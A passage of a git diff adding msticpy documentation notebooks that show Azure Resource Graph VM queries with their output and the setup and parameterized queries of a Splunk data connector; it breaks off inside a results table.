+       "2  /subscriptions/8eebd9ad-e271-4989-a796-d60c576...  GodzillaTron1   \n",
+       "\n",
+       "                                type                              tenantId  \\\n",
+       "0  microsoft.compute/virtualmachines  72f988bf-86f1-41af-91ab-2d7cd011db47   \n",
+       "1  microsoft.compute/virtualmachines  72f988bf-86f1-41af-91ab-2d7cd011db47   \n",
+       "2  microsoft.compute/virtualmachines  72f988bf-86f1-41af-91ab-2d7cd011db47   \n",
+       "\n",
+       "  kind   location   resourceGroup                        subscriptionId  \\\n",
+       "0         eastus2    linuxtestlab  8eebd9ad-e271-4989-a796-d60c57655743   \n",
+       "1         eastus2    linuxtestlab  8eebd9ad-e271-4989-a796-d60c57655743   \n",
+       "2       japanwest  monster-island  8eebd9ad-e271-4989-a796-d60c57655743   \n",
+       "\n",
+       "  managedBy   sku  ... tags.azsecpack  \\\n",
+       "0            None  ...        nonprod   \n",
+       "1            None  ...        nonprod   \n",
+       "2            None  ...            NaN   \n",
+       "\n",
+       "  identity.userAssignedIdentities./subscriptions/8eebd9ad-e271-4989-a796-d60c57655743/resourceGroups/AzSecPackAutoConfigRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/AzSecPackAutoConfigUA-eastus2.principalId  \\\n",
+       "0               e660337c-1cc7-4818-b8c8-3f005dbc6f2a                                                                                                                                                                              \n",
+       "1               e660337c-1cc7-4818-b8c8-3f005dbc6f2a                                                                                                                                                                              \n",
+       "2                                                NaN                                                                                                                                                                              \n",
+       "\n",
+       "  identity.userAssignedIdentities./subscriptions/8eebd9ad-e271-4989-a796-d60c57655743/resourceGroups/AzSecPackAutoConfigRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/AzSecPackAutoConfigUA-eastus2.clientId  \\\n",
+       "0               5fae63c7-985a-4432-9ff2-ef6ff0dc7db6                                                                                                                                                                           \n",
+       "1               5fae63c7-985a-4432-9ff2-ef6ff0dc7db6                                                                                                                                                                           \n",
+       "2                                                NaN                                                                                                                                                                           \n",
+       "\n",
+       "  identity.type identity           properties.storageProfile.osDisk.vhd.uri  \\\n",
+       "0  UserAssigned      NaN                                                NaN   \n",
+       "1  UserAssigned      NaN                                                NaN   \n",
+       "2           NaN      NaN  https://monsterislanddisks868.blob.core.window...   \n",
+       "\n",
+       "  properties.osProfile.windowsConfiguration.patchSettings.patchMode  \\\n",
+       "0                                                NaN                  \n",
+       "1                                                NaN                  \n",
+       "2                                      AutomaticByOS                  \n",
+       "\n",
+       "  properties.osProfile.windowsConfiguration.provisionVMAgent  \\\n",
+       "0                                                NaN           \n",
+       "1                                                NaN           \n",
+       "2                                               True           \n",
+       "\n",
+       "  properties.osProfile.windowsConfiguration.enableAutomaticUpdates  \\\n",
+       "0                                                NaN                 \n",
+       "1                                                NaN                 \n",
+       "2                                               True                 \n",
+       "\n",
+       "  properties.diagnosticsProfile.bootDiagnostics.storageUri  \n",
+       "0                                                NaN        \n",
+       "1                                                NaN        \n",
+       "2  https://monsterislanddiag271.blob.core.windows...        \n",
+       "\n",
+       "[3 rows x 58 columns]"
+      ]
+     },
+     "execution_count": 33,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "query = \"Resources | where type =~ 'Microsoft.Compute/virtualMachines' | take 3\"\n",
+    "qry_prov.exec_query(query)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "8cee1401-26c8-45cf-b184-7d6a67d8b447",
+   "metadata": {},
+   "source": [
+    "<div class=\"alert alert-block alert-info\">\n",
+    "<b>Note:</b> Resource Graph queries are limited to 1000 rows of output each. <br>\n",
+    "If your query returns 1000 rows it is likely it has hit this limit, consider re-writing the query to return a smaller subset of data. <br>\n",
+    "This applies to both built in queries and ad-hoc queries.<br>\n",
+    "</div>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "c7a0e691-a114-44ff-8000-74f259262ef1",
+   "metadata": {},
+   "source": [
+    "## End-to-end Example\n",
+    "\n",
+    "In this example we want to take a look at all of the virtual machines we have in our environment and they get specific details including public IP on one of them:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "id": "03d85748-1d44-453a-b3e9-4d69277e6e19",
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Connected\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "# Initialize and connect to provider\n",
+    "qry_prov = QueryProvider(\"ResourceGraph\")\n",
+    "qry_prov.connect()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 36,
+   "id": "41281a4f-a717-41fe-84d1-5df00f1fdff1",
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Number of VMs found : 418\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>id</th>\n",
+       "      <th>name</th>\n",
+       "      <th>type</th>\n",
+       "      <th>tenantId</th>\n",
+       "      <th>kind</th>\n",
+       "      <th>location</th>\n",
+       "      <th>resourceGroup</th>\n",
+       "      <th>subscriptionId</th>\n",
+       "      <th>managedBy</th>\n",
+       "      <th>sku</th>\n",
+       "      <th>...</th>\n",
+       "      <th>properties.extended.instanceView.powerState.displayStatus</th>\n",
+       "      <th>properties.extended.instanceView.powerState.level</th>\n",
+       "      <th>properties.extended.instanceView.powerState.code</th>\n",
+       "      <th>properties.vmId</th>\n",
+       "      <th>properties.diagnosticsProfile.bootDiagnostics.enabled</th>\n",
+       "      <th>tags.platformsettings.host_environment.service.platform_optedin_for_rootcerts</th>\n",
+       "      <th>tags.azsecpack</th>\n",
+       "      <th>identity.principalId</th>\n",
+       "      <th>identity.tenantId</th>\n",
+       "      <th>identity.type</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f...</td>\n",
+       "      <td>MSTIC-DSVM</td>\n",
+       "      <td>microsoft.compute/virtualmachines</td>\n",
+       "      <td>72f988bf-86f1-41af-91ab-2d7cd011db47</td>\n",
+       "      <td></td>\n",
+       "      <td>eastus</td>\n",
+       "      <td>msticpy</td>\n",
+       "      <td>40dcc8bf-0478-4f3b-b275-ed0a94f2c013</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>VM deallocated</td>\n",
+       "      <td>Info</td>\n",
+       "      <td>PowerState/deallocated</td>\n",
+       "      <td>280b7966-c42f-4730-b993-62bef12b187d</td>\n",
+       "      <td>True</td>\n",
+       "      <td>true</td>\n",
+       "      <td>nonprod</td>\n",
+       "      <td>7eece21d-835f-432e-b049-2c3002f3879e</td>\n",
+       "      <td>72f988bf-86f1-41af-91ab-2d7cd011db47</td>\n",
+       "      <td>SystemAssigned, UserAssigned</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>1 rows × 46 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                  id        name  \\\n",
+       "0  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f...  MSTIC-DSVM   \n",
+       "\n",
+       "                                type                              tenantId  \\\n",
+       "0  microsoft.compute/virtualmachines  72f988bf-86f1-41af-91ab-2d7cd011db47   \n",
+       "\n",
+       "  kind location resourceGroup                        subscriptionId managedBy  \\\n",
+       "0        eastus       msticpy  40dcc8bf-0478-4f3b-b275-ed0a94f2c013             \n",
+       "\n",
+       "    sku  ... properties.extended.instanceView.powerState.displayStatus  \\\n",
+       "0  None  ...                                     VM deallocated          \n",
+       "\n",
+       "  properties.extended.instanceView.powerState.level  \\\n",
+       "0                                              Info   \n",
+       "\n",
+       "  properties.extended.instanceView.powerState.code  \\\n",
+       "0                           PowerState/deallocated   \n",
+       "\n",
+       "                        properties.vmId  \\\n",
+       "0  280b7966-c42f-4730-b993-62bef12b187d   \n",
+       "\n",
+       "  properties.diagnosticsProfile.bootDiagnostics.enabled  \\\n",
+       "0                                               True      \n",
+       "\n",
+       "  tags.platformsettings.host_environment.service.platform_optedin_for_rootcerts  \\\n",
+       "0                                               true                              \n",
+       "\n",
+       "  tags.azsecpack                  identity.principalId  \\\n",
+       "0        nonprod  7eece21d-835f-432e-b049-2c3002f3879e   \n",
+       "\n",
+       "                      identity.tenantId                 identity.type  \n",
+       "0  72f988bf-86f1-41af-91ab-2d7cd011db47  SystemAssigned, UserAssigned  \n",
+       "\n",
+       "[1 rows x 46 columns]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Get list of VMs and see how many we have\n",
+    "vms = qry_prov.ResourceGraph.list_virtual_machines()\n",
+    "print(f\"Number of VMs found : {len(vms.index)}\")\n",
+    "# Filter the query to get a smaller dataset\n",
+    "vms = qry_prov.ResourceGraph.list_virtual_machines(add_query_items=\"| where resourceGroup contains 'msticpy'\")\n",
+    "display(vms)\n",
+    "# Set hostname for our next query\n",
+    "hostname = vms.iloc[0]['name']"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "2dfd1fef-a14a-409a-a5f9-6bb53458527f",
+   "metadata": {},
+   "source": [
+    "Now we can get details on the specific VM using its hostname."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 37,
+   "id": "a94a0680-1036-4d05-8cf4-7b38f23886ab",
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================\n",
+      "vmId                                                                                                                               vmName      vmSize        nicId                                                                                                                                   publicIpId                                                                                                                              publicIpAddress\n",
+      "=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================\n",
+      "/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/MSTICpy/providers/Microsoft.Compute/virtualMachines/MSTIC-DSVM  MSTIC-DSVM  Standard_B2s  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/MSTICpy/providers/Microsoft.Network/networkInterfaces/mstic-dsvm832  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/MSTICpy/providers/Microsoft.Network/publicIPAddresses/MSTIC-DSVM-ip  20.55.96.194\n",
+      "=================================================================================================================================  ==========  ============  ======================================================================================================================================  ======================================================================================================================================  =================\n"
+     ]
+    }
+   ],
+   "source": [
+    "df = qry_prov.ResourceGraph.list_detailed_virtual_machines(host_name=hostname)\n",
+    "\n",
+    "print(tabulate(df.head(), df.columns, tablefmt=\"rst\", showindex=False))\n",
+    "\n",
+    "# copy table to clipboard and paste in RST doc\n",
+    "clip.copy(tabulate(df.head(), df.columns, tablefmt=\"rst\", showindex=False))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "2f9af1b5-683b-46e4-92ff-9a05d4b13a93",
+   "metadata": {},
+   "source": [
+    "## References\n",
+    "\n",
+    "- Azure Resource Graph: https://docs.microsoft.com/azure/governance/resource-graph/overview\n",
+    "- Resource Graph Query Language: https://docs.microsoft.com/azure/governance/resource-graph/concepts/query-language"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.8.8"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {
+     "177cea49a53a43219886aed023d1d1e3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "235a53ea6abb45979ae7b91fbff1e5fb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "300px",
+       "width": "50%"
+      }
+     },
+     "34ead46181f74ca9b2f28c74a9e8a252": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "3a227f09e6ea4f5aa9d3781ffce26274": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "4be04d0eb6954df29ccba9efe619eba9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "ResourceGraph.list_detailed_virtual_machines",
+        "ResourceGraph.list_public_ips",
+        "ResourceGraph.list_resources",
+        "ResourceGraph.list_resources_by_api_version",
+        "ResourceGraph.list_resources_by_type",
+        "ResourceGraph.list_virtual_machines"
+       ],
+       "description": "Select an item",
+       "index": 0,
+       "layout": "IPY_MODEL_8bc9addf7cf34eacbb363393be0c3766",
+       "style": "IPY_MODEL_99ede81bf17044dfbe37c95e5fa30458"
+      }
+     },
+     "503bd34f33b94a7a8ab939991a693866": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "95%"
+      }
+     },
+     "5a10e2d1d1d3481691eeaf9cc9420080": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_c84ab0195d1b453b938a2d7bc62e78bb",
+        "IPY_MODEL_e96753f8b28c4ba6a1699e5824a3172e"
+       ],
+       "layout": "IPY_MODEL_177cea49a53a43219886aed023d1d1e3"
+      }
+     },
+     "732eeea243ba4ee0afd66bff6e7c182b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "73f73bc8c2614403a5894acef9e68f2d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "7b82fa165eab47ec8cb6f8eb71a24139": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "8bc9addf7cf34eacbb363393be0c3766": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "300px",
+       "width": "50%"
+      }
+     },
+     "99ede81bf17044dfbe37c95e5fa30458": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "initial"
+      }
+     },
+     "b4a5cfd93dae4548970b6d78be9e19ab": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "c84ab0195d1b453b938a2d7bc62e78bb": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_73f73bc8c2614403a5894acef9e68f2d",
+       "style": "IPY_MODEL_732eeea243ba4ee0afd66bff6e7c182b"
+      }
+     },
+     "d51df8f199544b22a6040e809ebe8a1a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ddc3b15c50a64049851a33986a1d65e5",
+        "IPY_MODEL_4be04d0eb6954df29ccba9efe619eba9"
+       ],
+       "layout": "IPY_MODEL_b4a5cfd93dae4548970b6d78be9e19ab"
+      }
+     },
+     "ddc3b15c50a64049851a33986a1d65e5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Filter:",
+       "layout": "IPY_MODEL_7b82fa165eab47ec8cb6f8eb71a24139",
+       "style": "IPY_MODEL_34ead46181f74ca9b2f28c74a9e8a252"
+      }
+     },
+     "e96753f8b28c4ba6a1699e5824a3172e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "ResourceGraph.list_detailed_virtual_machines",
+        "ResourceGraph.list_public_ips",
+        "ResourceGraph.list_resources",
+        "ResourceGraph.list_resources_by_api_version",
+        "ResourceGraph.list_resources_by_type",
+        "ResourceGraph.list_virtual_machines"
+       ],
+       "description": "Select an item",
+       "index": 0,
+       "layout": "IPY_MODEL_235a53ea6abb45979ae7b91fbff1e5fb",
+       "style": "IPY_MODEL_3a227f09e6ea4f5aa9d3781ffce26274"
+      }
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 5
+}
diff --git a/docs/notebooks/Splunk-DataConnector.ipynb b/docs/notebooks/Splunk-DataConnector.ipynb
new file mode 100644
index 000000000..0bc73dfc7
--- /dev/null
+++ b/docs/notebooks/Splunk-DataConnector.ipynb
@@ -0,0 +1,1222 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Splunk - Data Connector"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Description\n",
+    "The data provider module of msticpy provides functions to allow for the defining of data sources, connectors to them and queries for them as well as the ability to return query result from the defined data sources. \n",
+    "\n",
+    "For more information on Data Propviders, check documentation\n",
+    "- Data Provider: https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html\n",
+    "\n",
+    "In this notebooks we will demonstrate Splunk data connector feature of msticpy. \n",
+    "This feature is built on-top of the [Splunk Enterprise SDK for Python] (https://dev.splunk.com/enterprise/docs/devtools/python/sdk-python/) with some customizations and enhancements."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Installation"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:14:41.244954Z",
+     "start_time": "2020-08-07T19:14:41.241519Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "# Only run first time to install/upgrade msticpy to latest version\n",
+    "#%pip install --upgrade msticpy[splunk]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "\n",
+    "Authentication for the Splunk data provider is handled by specifying credentials directly in the connect call or specifying the credentials in msticpy config file.\n",
+    "\n",
+    "For more information on how to create new user with approapriate roles and permissions, follow Splunk Docs [Addandeditusers](https://docs.splunk.com/Documentation/Splunk/8.0.5/Security/Addandeditusers) and [Aboutusersandroles](https://docs.splunk.com/Documentation/Splunk/8.0.5/Security/Aboutusersandroles). The user should have permission to at least run its own searches or more depending upon the actions to be performed by user.\n",
+    "\n",
+    "Once you created user account with the appropriate roles, you will require the following details to specify while connecting\n",
+    "- host = \"localhost\"(Splunk server FQDN hostname to connect, for locally installed splunk, you can specify localhost)\n",
+    "- port = 8089 (Splunk REST API )\n",
+    "- username = \"admin\" (username to connect to Splunk instance)\n",
+    "- password = \"yourpassword\" (password of the userspecified in username)\n",
+    "\n",
+    "Once you have details, you can specify it in `msticpyconfig.yaml` as shown in below example"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T17:50:18.361039Z",
+     "start_time": "2020-08-07T17:50:18.349006Z"
+    }
+   },
+   "source": [
+    "```\n",
+    "SplunkApp:\n",
+    "  Args:\n",
+    "    host: \"{Splunk server FQDN or localhost}\"\n",
+    "    port: \"{default 8089}\"\n",
+    "    username: \"{username with search permissions to connect}\"\n",
+    "    password: \"{password of the user specified}\"\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:14:46.801520Z",
+     "start_time": "2020-08-07T19:14:44.889959Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Imports Complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "#Check we are running Python 3.6\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "#imports\n",
+    "import pandas as pd\n",
+    "import msticpy.nbtools as nbtools\n",
+    "\n",
+    "#data library imports\n",
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "\n",
+    "print('Imports Complete')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Instantiating a query provider\n",
+    "\n",
+    "You can instantiate a data provider for Splunk by specifying the credentials in connect or in msticpy config file. \n",
+    "<br> If the details are correct and authentication is successful, it will show connected."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:09.229632Z",
+     "start_time": "2020-08-07T19:15:08.536426Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "connected\n"
+     ]
+    }
+   ],
+   "source": [
+    "splunk_prov = QueryProvider('Splunk')\n",
+    "splunk_prov.connect(host=<hostname>, username=<username>, password=<password>)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Listing available  queries\n",
+    "Upon connecting to the Splunk data environment, we can take a look what query options available to us by running `QUERY_PROVIDER.list_queries()`\n",
+    "\n",
+    "For more information, refer documentation : [Listing available queries](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#listing-available-queries).\n",
+    "\n",
+    "This will display all the saved searches from the connected splunk instance and also pre-built custom queries to do common operations such as list datatypes, list saved searches, alerts, audittrail informaion. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:41.581783Z",
+     "start_time": "2020-08-07T19:15:41.576649Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['Alerts.list_all_alerts',\n",
+       " 'SavedSearches.Errors_in_the_last_24_hours',\n",
+       " 'SavedSearches.Errors_in_the_last_hour',\n",
+       " 'SavedSearches.License_Usage_Data_Cube',\n",
+       " 'SavedSearches.Load_sample_User_Agreements',\n",
+       " 'SavedSearches.Messages_by_minute_last_3_hours',\n",
+       " 'SavedSearches.Orphaned_scheduled_searches',\n",
+       " 'SavedSearches.Score-Base',\n",
+       " 'SavedSearches.Splunk_errors_last_24_hours',\n",
+       " 'SavedSearches.Website_Performance_Problem',\n",
+       " 'SavedSearches.inoperable_sites_rangemap',\n",
+       " 'SavedSearches.slow_sites_avg_rangemap',\n",
+       " 'SavedSearches.slow_sites_rangemap',\n",
+       " 'SavedSearches.web_ping_inputs_lookup_gen',\n",
+       " 'SavedSearches.website_availability_overview',\n",
+       " 'SavedSearches.website_performance_problems',\n",
+       " 'SplunkGeneral.get_events_parameterized',\n",
+       " 'SplunkGeneral.list_all_datatypes',\n",
+       " 'SplunkGeneral.list_all_savedsearches',\n",
+       " 'audittrail.list_all_audittrail']"
+      ]
+     },
+     "execution_count": 4,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_prov.list_queries()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "In order to get help for specific query , you can execute `QUERY_PROVIDER.<QueryName>('?')` .\n",
+    "\n",
+    "For more information , refer documentation - [Getting Help for a query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#getting-help-for-a-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:45.274273Z",
+     "start_time": "2020-08-07T19:15:45.270895Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  get_events_parameterized\n",
+      "Data source:  Splunk\n",
+      "Generic parameterized query from index/source\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "add_query_items: str (optional)\n",
+      "    Additional query clauses\n",
+      "    (default value is: | head 100)\n",
+      "end: datetime (optional)\n",
+      "    Query end time\n",
+      "    (default value is: 08/26/2017:00:00:00)\n",
+      "index: str (optional)\n",
+      "    Splunk index name\n",
+      "    (default value is: *)\n",
+      "project_fields: str (optional)\n",
+      "    Project Field names\n",
+      "    (default value is: | table TimeCreated, host, EventID, EventDescripti...)\n",
+      "source: str (optional)\n",
+      "    Splunk source type\n",
+      "    (default value is: *)\n",
+      "start: datetime (optional)\n",
+      "    Query start time\n",
+      "    (default value is: 08/25/2017:00:00:00)\n",
+      "timeformat: str (optional)\n",
+      "    Datetime format to use in Splunk query\n",
+      "    (default value is: \"%Y-%m-%d %H:%M:%S.%6N\")\n",
+      "Query:\n",
+      " search index={index} source={source} timeformat={timeformat} earliest={start} latest={end} {project_fields} {add_query_items}\n"
+     ]
+    }
+   ],
+   "source": [
+    "splunk_prov.SplunkGeneral.get_events_parameterized('?')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If you want to print the query prior to executing, pass 'print' as an argument"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:47.472139Z",
+     "start_time": "2020-08-07T19:15:47.464802Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "' search index=* source=* timeformat=\"%Y-%m-%d %H:%M:%S.%6N\" earliest=\"2020-08-15 19:15:47.466710\" latest=\"2020-08-15 19:15:47.466938\" | table TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image, parent_process, ParentCommandLine, dest, Hashes | head 100'"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_prov.SplunkGeneral.get_events_parameterized('print')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If you have set the arguments and then would like to validate the query, use below example"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:48.918900Z",
+     "start_time": "2020-08-07T19:15:48.910871Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "' search index=botsv2 source=WinEventLog:Microsoft-Windows-Sysmon/Operational timeformat=%Y-%m-%d %H:%M:%S earliest=\"2017-08-25 00:00:00\" latest=\"2017-08-25 10:00:00\" | table TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image, parent_process, ParentCommandLine, dest, Hashes | head 100'"
+      ]
+     },
+     "execution_count": 7,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "splunk_prov.SplunkGeneral.get_events_parameterized('print',\n",
+    "    index=\"botsv2\",\n",
+    "    source=\"WinEventLog:Microsoft-Windows-Sysmon/Operational\",\n",
+    "    timeformat=\"%Y-%m-%d %H:%M:%S\",\n",
+    "    start=\"2017-08-25 00:00:00\",\n",
+    "    end=\"2017-08-25 10:00:00\"\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Running pre-defined query\n",
+    "In order to run pre-defined query , execute with the name either by setting values for arguments if available or run with default arguments.\n",
+    "\n",
+    "For more information , refer documentation - [Running an pre-definedfined query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#running-an-pre-defined-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-07T19:15:53.467435Z",
+     "start_time": "2020-08-07T19:15:52.097203Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeCreated</th>\n",
+       "      <th>host</th>\n",
